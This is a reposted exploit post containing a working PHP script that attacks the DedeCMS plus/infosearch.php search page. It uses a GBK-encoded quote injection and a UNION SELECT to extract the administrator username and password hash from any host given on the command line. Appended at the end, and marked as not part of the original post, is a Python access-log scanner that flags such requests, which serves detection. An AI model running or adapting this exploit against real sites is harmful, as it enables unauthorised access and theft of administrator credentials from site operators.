dedecms plus/infosearch.php exp

Posted by: 7747.Net  Editor: 7747.Net

BY 冰的原点
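Note: Many thanks to oldjun; I modeled this on his exp, hehe. You all probably already know which file is vulnerable. It's not well written, so please don't hold it against me!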
<?
print_r('
--------------------------------------------------------------------------------
dedecms gpk "/plus/infosearch.php" SQL injection exploit
BY 冰的原点
thx oldjun
--------------------------------------------------------------------------------
');

if ($argc<3) {
    print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
    die;
}

function sendpacketii($packet)
{
    global $host, $html;
    $ock=fsockopen(gethostbyname($host),'80');
    if (!$ock) {
        echo 'No response from '.$host;
        die;
    }
    fputs($ock,$packet);
    $html='';
    while (!feof($ock)) {
        $html.=fgets($ock);
    }
    fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {
    echo 'Error... check the path!';
    die;
}

$packet ="GET ".$path."plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,concat(uname,0x3a,substring(pwd,9,16)),4,5,6%20from%20dede_admin/*# HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);

if (!eregi(":",$html)) {
    echo $packet;
    echo $html;
    die("Exploit failed...");
} else {
    $pattern="/\" class=\"title\">(.*?)<\/a>/si";
    preg_match($pattern,$html,$pg);
    $result=explode(":",$pg[1]);
    print_r('
--------------------------------------------------------------------------------
[+]username -> '.$result[0].'
[+]password(16位md5) -> '.$result[1].'
--------------------------------------------------------------------------------
');
}

function is_hash($hash)
{
    if (ereg("^[a-z0-9]{16}",trim($hash))) {return true;}
    else {return false;}
}

if (is_hash($result[1])) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
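Added example, not part of the original post: a Python access-log check that flags requests shaped like the one the script above sends, that is, a `q` parameter on `plus/infosearch.php` carrying a high byte directly before a quote, or SQL keywords. The log lines, IP addresses and the function names `inspect` and `scan` are constructed for illustration. The high-byte rule is a heuristic and can also match legitimate non-ASCII text followed by an apostrophe.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed access-log lines (common log format); IPs are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2009:10:00:00 +0800] "GET /plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,concat(uname,0x3a,substring(pwd,9,16)),4,5,6%20from%20dede_admin/*# HTTP/1.0" 200 5120',
    '203.0.113.5 - - [01/Jan/2009:10:00:05 +0800] "GET /plus/infosearch.php?action=search&q=%e5%ae%89%e5%85%a8 HTTP/1.1" 200 4096',
    '203.0.113.9 - - [01/Jan/2009:10:00:09 +0800] "GET /cms/plus/infosearch.php?action=search&q=x%27+UNION+SELECT+1,2,3 HTTP/1.1" 200 4100',
    '203.0.113.5 - - [01/Jan/2009:10:00:12 +0800] "GET /index.php HTTP/1.1" 200 9000',
]

# client IP, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
# SQL fragments seen in the request on this page, matched on the decoded bytes
SQL_RE = re.compile(rb"union\s+(all\s+)?select\b|\bfrom\s+dede_admin\b|concat\s*\(", re.I)
# A byte in 0x81-0xFE immediately followed by a single quote (the %cf%27 shape)
HIGH_BYTE_QUOTE_RE = re.compile(rb"[\x81-\xfe]'")


def inspect(line):
    """Return (ip, status, reasons) for a suspicious infosearch.php hit, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    parts = urlsplit(target)
    # The site may live under any base path, so match on the path suffix.
    if not parts.path.lower().endswith("/plus/infosearch.php"):
        return None
    reasons = set()
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if name != "q":
            continue
        # Decode to raw bytes: the parameter is not guaranteed to be valid UTF-8.
        value = unquote_to_bytes(raw.replace("+", " "))
        if HIGH_BYTE_QUOTE_RE.search(value):
            reasons.add("high-byte-before-quote")
        if SQL_RE.search(value):
            reasons.add("sql-keywords")
    return (ip, int(status), sorted(reasons)) if reasons else None


def scan(lines):
    """Inspect every line and keep only the flagged requests."""
    return [hit for hit in map(inspect, lines) if hit]


if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE_LOG):
        print(ip, status, ",".join(reasons))
```

Where request cookies are logged, the script's hard-coded `PHPSESSID` value is a further indicator to search for.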